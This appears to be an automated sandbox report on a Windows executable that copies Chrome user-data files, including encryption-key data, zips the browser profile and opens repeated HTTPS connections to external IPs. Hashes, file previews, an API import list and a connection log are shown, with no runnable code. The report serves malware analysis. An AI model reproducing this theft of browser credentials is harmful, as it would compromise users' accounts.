Preview:	{"browser":{"first_run_finished":true,"first_run_study_group":"EnabledE-5","shortcut_migration_version":"117.0.5938.132"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAACz9LIY/Sft4sF7BR0/+RlMXu9lhIRI5BaZTSQpyRPpLAAAAAAOgAAAAAIAACAAAADpL4/Y0/1c7GfAyejoQlHrWIfhufkrSTaxhr33kLRaiGABAABCz7EyQ+8ml1FxjRqtgyeWwLLZ2IHAzJeD0JnWN0wZz313G7DGWg+UAsBKIMQy5yoFT6uS18pLOAyaJXxUDloUrKvqu51HeVrnYHoVb8WT7jb6PiSZemofWqeToVsJHvtWDZt5T3cRsPTFluK+ErdhV/M4aslTfHhHU5oOdEFpJOJjtEggjyvy+1z4MfOSzFQSR/yUPtVqL11Kienypq7Pfce/sgXQVyQx5HJtARkiij5S80SSAzlX7odXphhcK8KFY7RZq5/8tF3h6DjBHxi9tJQHjyUkWUars8S2pxC2nfARqxQF3hsXBSGhzpXzBeEyndaMlhVfFQG+uOvLDxv6WWNzrjY/N23xyPWDnjICFAZ1Phbd/J/YvjpTb6AiXnSITx3SZj6TKb6dLBr9boJsB8rSYGXCaHgO5j6IZBvlJWu9yNA8rR4b0hxpmRkM7XxuKP

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Variations

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
MD5:	BC6142469CD7DADF107BE9AD87EA4753
SHA1:	72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
SHA-256:	B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
SHA-512:	47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\first_party_sets.db

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 20, database pages 12, cookie 0xa, schema 4, UTF-8, version-valid-for 20
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.5172035876292017
Encrypted:	false
SSDEEP:	24:TLr4/arHRH34kQrq+i7ZYZY5J+Qnj3k0rJXAeL3mkAD6W6Ivrr6Uw+6EfL:TI/IHRH34kWqB1kQnjhHmr6ITmUPJL
MD5:	4EF1AD21E1EFEABEC98B4C8EAE12EE60
SHA1:	39FA0F103F53A893EB319DD6FE7FA74CDD1F8D7D
SHA-256:	C39A9A46BC5BED2426346704E3C4E378D30FF5DAA8103620592CDAABCF046C8D
SHA-512:	0F114B6A2C381EC9E10ACF3E46C3FA646C178709C131D8487825BBAADDD2059CE4D4BA43C3C87DA1EFF02D910841833C618EFDD818AB3553D8F5BDF80C83AAEC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......\..g.................C.\......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\source_info.json

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	5.317560986498759
Encrypted:	false
SSDEEP:	6:YGMR4YFsPTALaNDfXS9vc/QC3sUMXgHaDHpJNWDKaJkDbMyJWm4:YGQ4YFs7AeNEcvsUMwHeJJEWaYJWm4
MD5:	591F18D26728C977CF4BAAEBFF78C576
SHA1:	3763ECE460219874DC5320708A87E636DE106B9A
SHA-256:	5A104BC8DC7146A4EBFD2AD7CE9016D8E56EE6C8B421F095BEDA2BB0F340799E
SHA-512:	83C196BD1B0859C61CBAFB2EAB556D01EA606C7B65F3A310DE1F5C4F98366C3E74D19CCDE3FADC2F3AEE628BAEDFEA31CB2B50BC4B4C1E2E4B273438FF8252B1
Malicious:	false
Preview:	{"city":"new york city","country":"us","created_at":1724981167,"encrypted_master_key":"RYcsYm7xLcDwOYLoaq8Y7XSOJp4MTW3rqA38j1LODBOx1OVU1BeugRt2yR/dtMx7","ip_address":"8.46.123.33","isp_org":"LEVEL3","region":"new york","source_user_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data"}

C:\Users\user\AppData\Local\Google\Chrome\user_data.zip

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	446151
Entropy (8bit):	7.913767327716293
Encrypted:	false
SSDEEP:	12288:O/Z/52if8A2z8lQ6jUYOvmSMWWns9UKVWFcFt7z:5dA2QVOv5WLYP3
MD5:	786AEF69D726B92B7A8E87D4A5F0AEDB
SHA1:	F21327B4B69234B7A0E6F3FA2A1A5A44BED42EF5
SHA-256:	82324D8ED5CF99F08D401F406BA14190AD323A35406ABE015B0F51F1E41D6B30
SHA-512:	5B58E61184ABA410C5A1982B405BBE22B69C5253BE0C2517857E8966D5351B5B4778C1E6E487887C53D8F92B4EF70C745A20E32D4B046B5110BF7B82296498B2
Malicious:	false
Preview:	PK........B..Y............+...User Data Temp\Default\Affiliation DatabaseUT......f...n.T......eQE.....5.(B.....!"u.i...r.....i....y.^`6..G..l..D.G.gZ.V...'.....u"].'u?V.2..^,?..B...R.!6..9q+#.X..5....._..D6.Z.O._v~.Q.....\.~..,......7.-#oY....~.u.X."?.E.([m..-[./.L.d......V..+M.4Z.9........,.0..7,M...z.]u.X..0.....-.....M#.........v.".. ....p+U.BR....9-.......J.\~c...Y.Qs.M..vZEy.U.....7.Go^^.bwn.YB6...T..3...w,.p.].[..VN..#.(....Z#.0..%mt0..=a...@..j.....7oN/......eG'E-.da.....a.K%.E.n.t..8sw.oF...}r.........5k.,..;.to.....-..L&.Z..~....-...LrW...;. RWC.k/.....$..%.#ue.J..?8....3..~Z.s..?........b..~.f.....vO['..Z......F....T.%.k...-.....w.l^....^w..w.>Z.......n9...!6...m!.n.....o..e........m...Cs.....}/./..}......5}....j..w...Q...T..........}.......[...j.<..s..6....?.{......lp.................................Xu.......X}.........c................V.......PK..aU..I.......PK........B..Y............3...User Data Temp\Default\Affiliat

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 03:26:01.603672981 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:01.603730917 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:01.603882074 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:01.605220079 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:01.605237007 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.158401966 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.160473108 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.160506010 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.165344000 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.165349960 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.166595936 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.166661978 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.209301949 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.209397078 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.209417105 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.256501913 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.256505013 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.256519079 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.304089069 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.445127964 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.445240974 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.445314884 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.445537090 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.445553064 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.445570946 CEST	49730	443	192.168.2.4	104.26.8.44
Aug 30, 2024 03:26:02.445576906 CEST	443	49730	104.26.8.44	192.168.2.4
Aug 30, 2024 03:26:02.454463005 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:02.454488993 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:02.454567909 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:02.455843925 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:02.455856085 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.111839056 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.153801918 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:03.153847933 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.162034035 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:03.162045956 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.163058996 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.163141012 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:03.185599089 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:03.185676098 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.185741901 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:03.185753107 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:03.234867096 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:05.190859079 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:05.190943956 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:05.191019058 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:05.191198111 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:05.191210985 CEST	443	49731	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:05.191226959 CEST	49731	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:06.528609037 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:06.528647900 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:06.528732061 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:06.529515028 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:06.529526949 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.182228088 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.182378054 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:07.182385921 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.182852030 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:07.182857037 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.183754921 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.183811903 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:07.185897112 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:07.185975075 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.186037064 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:07.186042070 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:07.233514071 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.013832092 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:09.013930082 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:09.013988018 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.037883997 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.037899971 CEST	443	49732	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:09.037931919 CEST	49732	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.652348042 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.652393103 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:09.652484894 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.653148890 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:09.653163910 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.398854971 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.399401903 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:10.399432898 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.400440931 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:10.400446892 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.401452065 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.401508093 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:10.407963037 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:10.408078909 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.408098936 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:10.452501059 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.455204964 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:10.455219030 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:10.502963066 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:12.223432064 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:12.223526001 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:12.223582029 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:12.226378918 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:12.226404905 CEST	443	49733	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:12.226416111 CEST	49733	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:12.304301977 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:12.304354906 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:12.304451942 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:12.305144072 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:12.305159092 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.477365017 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.477654934 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:13.477680922 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.478079081 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:13.478085041 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.479135990 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.479196072 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:13.490191936 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:13.490269899 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.490288019 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:13.532509089 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.537520885 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:13.537530899 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:13.585244894 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.502484083 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:14.502583027 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:14.502641916 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.502964973 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.502984047 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:14.502996922 CEST	49734	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.503002882 CEST	443	49734	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:14.523606062 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.523650885 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:14.523710966 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.524624109 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:14.524638891 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.694344997 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.694545031 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.694570065 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.694999933 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.695005894 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.696098089 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.696157932 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.699206114 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.699275017 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.699604988 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.699613094 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.699762106 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.699790001 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.699857950 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.699882984 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.699947119 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.699975014 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.700021029 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700047970 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.700112104 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700122118 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.700258970 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700284958 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700288057 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.700505972 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700539112 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.700645924 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700679064 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.700807095 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.700817108 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.701004982 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.701018095 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.701488972 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.701503992 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.701585054 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.701592922 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.702068090 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.702080965 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.702368975 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.702382088 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.702709913 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.702723980 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.703001022 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.703012943 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.703490973 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.703501940 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.704027891 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.704040051 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.704283953 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.704296112 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.704739094 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.704749107 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.705141068 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.705154896 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.705377102 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.705393076 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.705792904 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.705806017 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.705982924 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.705990076 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.706156969 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.706163883 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.706336021 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.706347942 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.706515074 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.706526041 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.706685066 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.706702948 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.706908941 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.706921101 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.707168102 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.707179070 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.707371950 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.707382917 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.707585096 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.707597017 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:15.707844973 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.707916975 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:15.709930897 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:17.291510105 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:17.291593075 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:17.291722059 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:17.295844078 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:17.295874119 CEST	443	49735	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:17.295888901 CEST	49735	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:17.301398039 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:17.301428080 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:17.301693916 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:17.302447081 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:17.302460909 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.437779903 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.437961102 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:18.437988043 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.438380003 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:18.438385963 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.439287901 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.439352989 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:18.447491884 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:18.447555065 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.447626114 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:18.447701931 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:18.447709084 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:18.495065928 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:19.015147924 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:19.015222073 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:19.015297890 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:19.015758991 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:19.015773058 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:19.015794039 CEST	49739	443	192.168.2.4	154.18.200.103
Aug 30, 2024 03:26:19.015799046 CEST	443	49739	154.18.200.103	192.168.2.4
Aug 30, 2024 03:26:19.016944885 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.016963005 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.017036915 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.017746925 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.017756939 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.710120916 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.710707903 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.710716009 CEST	443	49742	46.4.105.116	192.168.2.4
